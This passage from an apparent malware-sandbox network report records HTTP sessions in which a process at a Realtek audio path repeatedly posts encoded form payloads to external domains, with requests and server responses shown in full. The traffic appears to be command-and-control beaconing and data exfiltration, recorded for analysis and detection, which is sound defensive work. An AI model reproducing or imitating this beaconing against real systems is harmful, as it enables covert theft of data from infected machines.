                                                                                        Data Ascii: .com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiYzI1OTg3MGUtOWFjYS00MDk3LWJmOWYtZjdmZWRjMjZhMjMwIiwicGFnZV90aW1lIjoxNzM0MDM2OTE0LCJwYWdlX3VybCI6Imh0dHA6Ly93d3cuYWN0aXZldXNlcnMudGV


                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                        19 | 192.168.11.20 | 49734 | 199.59.243.227 | 80 | 7500 | C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                        Dec 12, 2024 21:55:16.838540077 CET | 2578 | OUT | POST /f9au/ HTTP/1.1
                                                                                        Accept: */*
                                                                                        Accept-Language: en-US
                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Cache-Control: max-age=0
                                                                                        Content-Length: 7367
                                                                                        Connection: close
                                                                                        Host: www.activeusers.tech
                                                                                        Origin: http://www.activeusers.tech
                                                                                        Referer: http://www.activeusers.tech/f9au/
                                                                                        User-Agent: Mozilla/5.0 (compatible; Konqueror/3.5; Linux 2.6.24.4; X11) KHTML/3.5.9 (like Gecko) (Debian package 4:3.5.9.dfsg.1-2+b1)
                                                                                        Dec 12, 2024 21:55:16.838594913 CET | 5156 | OUT
                                                                                        Data Ascii: XXYp1whAMOcVCezfGmJ7TiPT/NeVYCOi55qge+wltateB6Bz92aFYUpE9fVdvgGH82/KjkbhgdevcYg+N8TQfBhIYQCi0FEKAreW7js+Fn7z4LmNhSIDQsGul+XR6KfJQcX/XOMBm4iEgNaLxp6Ldksr9CVPo4QT4rMx1sk4fdfsSdLA2PfPr9TLXknm4LNwiE2pkqECeM7M33ao41CdIzvSPAHgJiEckR2jzJ7xZ/rADLH67bN
                                                                                        Dec 12, 2024 21:55:16.838669062 CET | 91 | OUT
                                                                                        Data Ascii: HCIBH25SJ8QwkrO13Af6VWii+oPIRsCQoZG1gi9JoxCQdj+9TQQfS27TQ5W9TCHEsZuAOMv8b3oCjw+67KlyXO+9A==
                                                                                        Dec 12, 2024 21:55:16.969772100 CET | 1289 | IN | HTTP/1.1 200 OK
                                                                                        date: Thu, 12 Dec 2024 20:55:16 GMT
                                                                                        content-type: text/html; charset=utf-8
                                                                                        content-length: 1134
                                                                                        x-request-id: 6d9b8c58-a4a7-4c05-a87e-37a708d12063
                                                                                        cache-control: no-store, max-age=0
                                                                                        accept-ch: sec-ch-prefers-color-scheme
                                                                                        critical-ch: sec-ch-prefers-color-scheme
                                                                                        vary: sec-ch-prefers-color-scheme
                                                                                        x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_R/fR5qQWR1xDptT+DmYSSYR/2VJQ+VUI2409f40OoSTAAe3fXzVlaIhXcxlVus7LuSE9VVwXJuXSYnMM5AVaaw==
                                                                                        set-cookie: parking_session=6d9b8c58-a4a7-4c05-a87e-37a708d12063; expires=Thu, 12 Dec 2024 21:10:16 GMT; path=/
                                                                                        connection: close
                                                                                        Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_R/fR5qQWR1xDptT+DmYSSYR/2VJQ+VUI2409f40OoSTAAe3fXzVlaIhXcxlVus7LuSE9VVwXJuXSYnMM5AVaaw==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"> <link rel="preconnect" href="https://www.google
                                                                                        Dec 12, 2024 21:55:16.969784021 CET | 534 | IN
                                                                                        Data Ascii: .com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiNmQ5YjhjNTgtYTRhNy00YzA1LWE4N2UtMzdhNzA4ZDEyMDYzIiwicGFnZV90aW1lIjoxNzM0MDM2OTE2LCJwYWdlX3VybCI6Imh0dHA6Ly93d3cuYWN0aXZldXNlcnMudGV


                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                        20 | 192.168.11.20 | 49735 | 199.59.243.227 | 80 | 7500 | C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                        Dec 12, 2024 21:55:19.492327929 CET | 386 | OUT | GET /f9au/?Hsa=KVXAK1dJ22EyzD&Sb=QRtPaBdQsqikqwtJ+Gac0NMmk/tHNWofn17hwciKQcyaSPo61+Z774QFVZQUbpc3NkgC7R9n74G00WikgwdAmD1VZwNHYhXmg3kBj5ds5wl7WitTMr5RZVw= HTTP/1.1
                                                                                        Accept: */*
                                                                                        Accept-Language: en-US
                                                                                        Connection: close
                                                                                        Host: www.activeusers.tech
                                                                                        User-Agent: Mozilla/5.0 (compatible; Konqueror/3.5; Linux 2.6.24.4; X11) KHTML/3.5.9 (like Gecko) (Debian package 4:3.5.9.dfsg.1-2+b1)
                                                                                        Dec 12, 2024 21:55:19.623517990 CET | 1289 | IN | HTTP/1.1 200 OK
                                                                                        date: Thu, 12 Dec 2024 20:55:18 GMT
                                                                                        content-type: text/html; charset=utf-8
                                                                                        content-length: 1470
                                                                                        x-request-id: 68df032f-a507-4631-84d7-0a9c926e9327
                                                                                        cache-control: no-store, max-age=0
                                                                                        accept-ch: sec-ch-prefers-color-scheme
                                                                                        critical-ch: sec-ch-prefers-color-scheme
                                                                                        vary: sec-ch-prefers-color-scheme
                                                                                        x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_ALI/9Olt9m1ZkzOMfzcy2LVj2hE0Gom0NMDOpcXQUuHK2TrWhpQp6HsbX4cM0ArCWMAwc2huG66tmwGKQrg3Tw==
                                                                                        set-cookie: parking_session=68df032f-a507-4631-84d7-0a9c926e9327; expires=Thu, 12 Dec 2024 21:10:19 GMT; path=/
                                                                                        connection: close
                                                                                        Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_ALI/9Olt9m1ZkzOMfzcy2LVj2hE0Gom0NMDOpcXQUuHK2TrWhpQp6HsbX4cM0ArCWMAwc2huG66tmwGKQrg3Tw==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"> <link rel="preconnect" href="https://www.google
                                                                                        Dec 12, 2024 21:55:19.623548985 CET | 870 | IN
                                                                                        Data Ascii: .com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiNjhkZjAzMmYtYTUwNy00NjMxLTg0ZDctMGE5YzkyNmU5MzI3IiwicGFnZV90aW1lIjoxNzM0MDM2OTE5LCJwYWdlX3VybCI6Imh0dHA6Ly93d3cuYWN0aXZldXNlcnMudGV


                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                        21 | 192.168.11.20 | 49736 | 209.74.79.40 | 80 | 7500 | C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                        Dec 12, 2024 21:55:24.982733965 CET | 656 | OUT | POST /b4eq/ HTTP/1.1
                                                                                        Accept: */*
                                                                                        Accept-Language: en-US
                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Cache-Control: max-age=0
                                                                                        Content-Length: 199
                                                                                        Connection: close
                                                                                        Host: www.unlimitu.website
                                                                                        Origin: http://www.unlimitu.website
                                                                                        Referer: http://www.unlimitu.website/b4eq/
                                                                                        User-Agent: Mozilla/5.0 (compatible; Konqueror/3.5; Linux 2.6.24.4; X11) KHTML/3.5.9 (like Gecko) (Debian package 4:3.5.9.dfsg.1-2+b1)
                                                                                        Data Ascii: Sb=7ZbWDL3MqbDuQKinp3Zo6m2mGLC4zTFGwgRcOcWcsibr5+czyefcFPrywzx2KoDZMvakJk2elv8EBYQE7LKRA9XLut/qJf3GrgqSbMxOZ7haEkVKL9vMRQzRnFFQchWibzlYJHqr1UZFRxGQ3WhL4w1mXep1ICcEFT7vVNEKnCuF8o0Elb4hL0wExbvBYXGiGw==
                                                                                        Dec 12, 2024 21:55:25.175986052 CET | 533 | IN | HTTP/1.1 404 Not Found
                                                                                        Date: Thu, 12 Dec 2024 20:55:25 GMT
                                                                                        Server: Apache
                                                                                        Content-Length: 389
                                                                                        Connection: close
                                                                                        Content-Type: text/html
                                                                                        Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                        22 | 192.168.11.20 | 49737 | 209.74.79.40 | 80 | 7500 | C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                        Dec 12, 2024 21:55:27.691076994 CET | 676 | OUT | POST /b4eq/ HTTP/1.1
                                                                                        Accept: */*
                                                                                        Accept-Language: en-US
                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Cache-Control: max-age=0
                                                                                        Content-Length: 219
                                                                                        Connection: close
                                                                                        Host: www.unlimitu.website
                                                                                        Origin: http://www.unlimitu.website
                                                                                        Referer: http://www.unlimitu.website/b4eq/
                                                                                        User-Agent: Mozilla/5.0 (compatible; Konqueror/3.5; Linux 2.6.24.4; X11) KHTML/3.5.9 (like Gecko) (Debian package 4:3.5.9.dfsg.1-2+b1)
                                                                                        Data Ascii: Sb=7ZbWDL3MqbDufJ6nvQFo9G2lDLC44zFCwgdcOdS1vR/r6eMzjrzcAPry4Tx/XYDHMumWJhOelv4EBd8E68meBtXJvd/oNf3GrgqSbMV0Z75aEwRKIe3PYwzOgFFQWBWmbzkiJDqF1XxFR06Q2EFMtg0tTeo1YnpqBi79RucIh3SY5+5e4pMFIns21rWpaVH5b437CdpVXuc4YCPp7FEuVQo=
                                                                                        Dec 12, 2024 21:55:27.871979952 CET | 533 | IN | HTTP/1.1 404 Not Found
                                                                                        Date: Thu, 12 Dec 2024 20:55:27 GMT
                                                                                        Server: Apache
                                                                                        Content-Length: 389
                                                                                        Connection: close
                                                                                        Content-Type: text/html
                                                                                        Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                        23 | 192.168.11.20 | 49738 | 209.74.79.40 | 80 | 7500 | C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                        Dec 12, 2024 21:55:30.394112110 CET | 1289 | OUT | POST /b4eq/ HTTP/1.1
                                                                                        Accept: */*
                                                                                        Accept-Language: en-US
                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Cache-Control: max-age=0
                                                                                        Content-Length: 7367
                                                                                        Connection: close
                                                                                        Host: www.unlimitu.website
                                                                                        Origin: http://www.unlimitu.website
                                                                                        Referer: http://www.unlimitu.website/b4eq/
                                                                                        User-Agent: Mozilla/5.0 (compatible; Konqueror/3.5; Linux 2.6.24.4; X11) KHTML/3.5.9 (like Gecko) (Debian package 4:3.5.9.dfsg.1-2+b1)
                                                                                        Dec 12, 2024 21:55:30.394176006 CET | 6536 | OUT
                                                                                        Data Ascii: EOYdAS02Eru5dUBMOGGC8tQh3VPQXboCNts01Fycd09Qi1K6u4ZgbzG8wrliL6EDa1iAf9DT0HrDVI7h5wYJ2T6b/0Wg1+Sh5TRy/qyytagyVXk3nwAkEFBuCpS23oEcX5qyI2lakIfUo1CL/SqpLRAVliIX2LoAdV9ruN3vz0hAkonnjvNptda5OdEhS4cvC9GRHY6F4di177U4S4rpV49FHO3Par3wI1qIW7bkqUTF7ZuoQAy
                                                                                        Dec 12, 2024 21:55:30.577013969 CET | 533 | IN | HTTP/1.1 404 Not Found
                                                                                        Date: Thu, 12 Dec 2024 20:55:30 GMT
                                                                                        Server: Apache
                                                                                        Content-Length: 389
                                                                                        Connection: close
                                                                                        Content-Type: text/html
                                                                                        Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                        24 | 192.168.11.20 | 49739 | 209.74.79.40 | 80 | 7500 | C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                        Dec 12, 2024 21:55:33.086163044 CET | 386 | OUT | GET /b4eq/?Sb=2bz2A+/Foq3BfYH3nkBAyBiQIN6vyGxA4CsyDuG2uzWi6t8+qfWmEOSu1g9JXJzNDc3HOGTjteURa686/52bGvnFkZWUI+XcrzebZPERH7tGcGhGffP7RzY=&Hsa=KVXAK1dJ22EyzD HTTP/1.1
                                                                                        Accept: */*
                                                                                        Accept-Language: en-US
                                                                                        Connection: close
                                                                                        Host: www.unlimitu.website
                                                                                        User-Agent: Mozilla/5.0 (compatible; Konqueror/3.5; Linux 2.6.24.4; X11) KHTML/3.5.9 (like Gecko) (Debian package 4:3.5.9.dfsg.1-2+b1)
                                                                                        Dec 12, 2024 21:55:33.256392002 CET | 548 | IN | HTTP/1.1 404 Not Found
                                                                                        Date: Thu, 12 Dec 2024 20:55:33 GMT
                                                                                        Server: Apache
                                                                                        Content-Length: 389
                                                                                        Connection: close
                                                                                        Content-Type: text/html; charset=utf-8
                                                                                        Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                        25 | 192.168.11.20 | 49740 | 199.59.243.227 | 80 | 7500 | C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                        Dec 12, 2024 21:55:38.574903011 CET | 629 | OUT | POST /tp8k/ HTTP/1.1
                                                                                        Accept: */*
                                                                                        Accept-Language: en-US
                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Cache-Control: max-age=0
                                                                                        Content-Length: 199
                                                                                        Connection: close
                                                                                        Host: www.sob.rip
                                                                                        Origin: http://www.sob.rip
                                                                                        Referer: http://www.sob.rip/tp8k/
                                                                                        User-Agent: Mozilla/5.0 (compatible; Konqueror/3.5; Linux 2.6.24.4; X11) KHTML/3.5.9 (like Gecko) (Debian package 4:3.5.9.dfsg.1-2+b1)
                                                                                        Data Ascii: Sb=bxZWh/FHVvJva8St8ZhyClTaAmr9SKjvquJC2EetBaZ6h2+RgQACV/btCDBByEJrFTRsCHy5C2FJJYRkZZgRnHhv2CCzuM6MQQVQ5BJDAgIsyJR6Iw56Kqhr8NfWJ0Ilfv9gqO8reeHB3U7ICuoLfBVZURcQ2Dukuo3u5PMUYU83AX1q3Ue15FwoU5b2AE5fkA==
                                                                                        Dec 12, 2024 21:55:38.706279993 CET | 1289 | IN | HTTP/1.1 200 OK
                                                                                        date: Thu, 12 Dec 2024 20:55:37 GMT
                                                                                        content-type: text/html; charset=utf-8
                                                                                        content-length: 1098
                                                                                        x-request-id: 6431c321-283b-4fae-937f-c5744729e43c
                                                                                        cache-control: no-store, max-age=0
                                                                                        accept-ch: sec-ch-prefers-color-scheme
                                                                                        critical-ch: sec-ch-prefers-color-scheme
                                                                                        vary: sec-ch-prefers-color-scheme
                                                                                        x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_CsJg1TE1AyQXoU0KEdPbV7FSQ3I7br8XXS7hqRDtBPFiWBOh2Uqz90eYqv43Fz/dN6H0Agt2A4EnG7ikR/OOHQ==
                                                                                        set-cookie: parking_session=6431c321-283b-4fae-937f-c5744729e43c; expires=Thu, 12 Dec 2024 21:10:38 GMT; path=/
                                                                                        connection: close
                                                                                        Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_CsJg1TE1AyQXoU0KEdPbV7FSQ3I7br8XXS7hqRDtBPFiWBOh2Uqz90eYqv43Fz/dN6H0Agt2A4EnG7ikR/OOHQ==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"> <link rel="preconnect" href="https://www.google
                                                                                        Dec 12, 2024 21:55:38.706302881 CET | 498 | IN
                                                                                        Data Ascii: .com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiNjQzMWMzMjEtMjgzYi00ZmFlLTkzN2YtYzU3NDQ3MjllNDNjIiwicGFnZV90aW1lIjoxNzM0MDM2OTM4LCJwYWdlX3VybCI6Imh0dHA6Ly93d3cuc29iLnJpcC90cDhrLyI


                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                        26 | 192.168.11.20 | 49741 | 199.59.243.227 | 80 | 7500 | C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                        Dec 12, 2024 21:55:41.237845898 CET | 649 | OUT | POST /tp8k/ HTTP/1.1
                                                                                        Accept: */*
                                                                                        Accept-Language: en-US
                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Cache-Control: max-age=0
                                                                                        Content-Length: 219
                                                                                        Connection: close
                                                                                        Host: www.sob.rip
                                                                                        Origin: http://www.sob.rip
                                                                                        Referer: http://www.sob.rip/tp8k/
                                                                                        User-Agent: Mozilla/5.0 (compatible; Konqueror/3.5; Linux 2.6.24.4; X11) KHTML/3.5.9 (like Gecko) (Debian package 4:3.5.9.dfsg.1-2+b1)
                                                                                        Data Ascii: Sb=bxZWh/FHVvJvbcitzbJyHFTZFmr9dqjrqu1C2Fq9BI96v3ORhS4CW/btIjBE2EJaFTdaCCS5C15JJYBkZq4eo3ht7iCxzc6MQQVQ5BNtAgQsy5h6JSB9DKhs/NfWN0Ipfv9eqMYFed/B3UrID7UEGRVbQRd++mSvipXc29QcZ1EYMh4wqmqR6WsaQJieCG4E5FI+3GEVkfb5VoyCjI/H8D0=
                                                                                        Dec 12, 2024 21:55:41.369225979 CET | 1289 | IN | HTTP/1.1 200 OK
                                                                                        date: Thu, 12 Dec 2024 20:55:40 GMT
                                                                                        content-type: text/html; charset=utf-8
                                                                                        content-length: 1098
                                                                                        x-request-id: 2c012780-2377-4a12-ae65-04934ea643f0
                                                                                        cache-control: no-store, max-age=0
                                                                                        accept-ch: sec-ch-prefers-color-scheme
                                                                                        critical-ch: sec-ch-prefers-color-scheme
                                                                                        vary: sec-ch-prefers-color-scheme
                                                                                        x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_CsJg1TE1AyQXoU0KEdPbV7FSQ3I7br8XXS7hqRDtBPFiWBOh2Uqz90eYqv43Fz/dN6H0Agt2A4EnG7ikR/OOHQ==
                                                                                        set-cookie: parking_session=2c012780-2377-4a12-ae65-04934ea643f0; expires=Thu, 12 Dec 2024 21:10:41 GMT; path=/
                                                                                        connection: close
                                                                                        Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_CsJg1TE1AyQXoU0KEdPbV7FSQ3I7br8XXS7hqRDtBPFiWBOh2Uqz90eYqv43Fz/dN6H0Agt2A4EnG7ikR/OOHQ==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"> <link rel="preconnect" href="https://www.google
                                                                                        Dec 12, 2024 21:55:41.369245052 CET | 498 | IN
                                                                                        Data Ascii: .com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiMmMwMTI3ODAtMjM3Ny00YTEyLWFlNjUtMDQ5MzRlYTY0M2YwIiwicGFnZV90aW1lIjoxNzM0MDM2OTQxLCJwYWdlX3VybCI6Imh0dHA6Ly93d3cuc29iLnJpcC90cDhrLyI


                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                        27 | 192.168.11.20 | 49742 | 199.59.243.227 | 80 | 7500 | C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                        Dec 12, 2024 21:55:43.880404949 CET | 1289 | OUT | POST /tp8k/ HTTP/1.1
                                                                                        Accept: */*
                                                                                        Accept-Language: en-US
                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Cache-Control: max-age=0
                                                                                        Content-Length: 7367
                                                                                        Connection: close
                                                                                        Host: www.sob.rip
                                                                                        Origin: http://www.sob.rip
                                                                                        Referer: http://www.sob.rip/tp8k/
                                                                                        User-Agent: Mozilla/5.0 (compatible; Konqueror/3.5; Linux 2.6.24.4; X11) KHTML/3.5.9 (like Gecko) (Debian package 4:3.5.9.dfsg.1-2+b1)
                                                                                        Dec 12, 2024 21:55:43.880458117 CET | 5156 | OUT
                                                                                        Data Ascii: PYewUIHe3aK1x/iEzcIxj9iFm+2JeliU5GnAWYDn+lSozZKbDKN/ALlc5hkDwoGWncSDuaNYmPwlXa5r/7udqkgjWf2stLO8fI1I7LMLb0VxPwOV0hDvjQyL+WVLpx0A9Ux8Kl67XLD6sd/mezKGTrq1TdY4Jt/I4WzigFNbCg+yK7jf3j6hAd4ThrfoGipDCz4hbWUa/w8UuqDLWs1xDGNwpAHdm4LARaZHpEMZd6sLOmwVgLU
                                                                                        Dec 12, 2024 21:55:43.880502939 CET | 1353 | OUT
                                                                                        Data Ascii: X7ack78TeZNBBsMeWEAqQPAo1rSXLwV7cJ+oKru+HsZJSxY4+XcBnJ+XWrLz0gM0XezsIVrfWgVqRn/yAzk1WFzJEQuT/6rBOuZ5ljztfCxcKAhUZj6IFioHKyoHVxsjHXauE7TGoOc6mLEdvZByjt9lJrpnig6STywry9z510UHfWvdZBZloq4mY9CWNASIdNX36ShJ4vqB5n/7pexDlCdpxg8VObIlx0PFU17VgBVbmt69mnS
                                                                                        Dec 12, 2024 21:55:44.012053013 CET | 1289 | IN | HTTP/1.1 200 OK
                                                                                        date: Thu, 12 Dec 2024 20:55:43 GMT
                                                                                        content-type: text/html; charset=utf-8
                                                                                        content-length: 1098
                                                                                        x-request-id: f6ea57ab-8a5e-4219-87a8-99656c3d6992
                                                                                        cache-control: no-store, max-age=0
                                                                                        accept-ch: sec-ch-prefers-color-scheme
                                                                                        critical-ch: sec-ch-prefers-color-scheme
                                                                                        vary: sec-ch-prefers-color-scheme
                                                                                        x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_CsJg1TE1AyQXoU0KEdPbV7FSQ3I7br8XXS7hqRDtBPFiWBOh2Uqz90eYqv43Fz/dN6H0Agt2A4EnG7ikR/OOHQ==
                                                                                        set-cookie: parking_session=f6ea57ab-8a5e-4219-87a8-99656c3d6992; expires=Thu, 12 Dec 2024 21:10:43 GMT; path=/
                                                                                        connection: close
                                                                                        Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_CsJg1TE1AyQXoU0KEdPbV7FSQ3I7br8XXS7hqRDtBPFiWBOh2Uqz90eYqv43Fz/dN6H0Agt2A4EnG7ikR/OOHQ==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"> <link rel="preconnect" href="https://www.google
                                                                                        Dec 12, 2024 21:55:44.012065887 CET | 498 | IN
                                                                                        Data Ascii: .com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiZjZlYTU3YWItOGE1ZS00MjE5LTg3YTgtOTk2NTZjM2Q2OTkyIiwicGFnZV90aW1lIjoxNzM0MDM2OTQzLCJwYWdlX3VybCI6Imh0dHA6Ly93d3cuc29iLnJpcC90cDhrLyI


                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                        28 | 192.168.11.20 | 49743 | 199.59.243.227 | 80 | 7500 | C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                        Dec 12, 2024 21:55:46.532443047 CET | 377 | OUT | GET /tp8k/?Hsa=KVXAK1dJ22EyzD&Sb=Wzx2iIlwW+94es3u4Lo0FS74KiXnatT9p9we6G2JYq0Bn2uTvRtkednmI39Cm2I2dBYZfF7KG0N4DZZkU64bjEcb6QrTm/GIaTVemQQoPiAr/pRWHyNTKL8= HTTP/1.1
                                                                                        Accept: */*
                                                                                        Accept-Language: en-US
                                                                                        Connection: close
                                                                                        Host: www.sob.rip
                                                                                        User-Agent: Mozilla/5.0 (compatible; Konqueror/3.5; Linux 2.6.24.4; X11) KHTML/3.5.9 (like Gecko) (Debian package 4:3.5.9.dfsg.1-2+b1)
                                                                                        Dec 12, 2024 21:55:46.663615942 CET | 1289 | IN | HTTP/1.1 200 OK
                                                                                        date: Thu, 12 Dec 2024 20:55:45 GMT
                                                                                        content-type: text/html; charset=utf-8
                                                                                        content-length: 1450
                                                                                        x-request-id: 721997bd-5b5d-43ec-a523-0bab8437e4c9
                                                                                        cache-control: no-store, max-age=0
                                                                                        accept-ch: sec-ch-prefers-color-scheme
                                                                                        critical-ch: sec-ch-prefers-color-scheme
                                                                                        vary: sec-ch-prefers-color-scheme
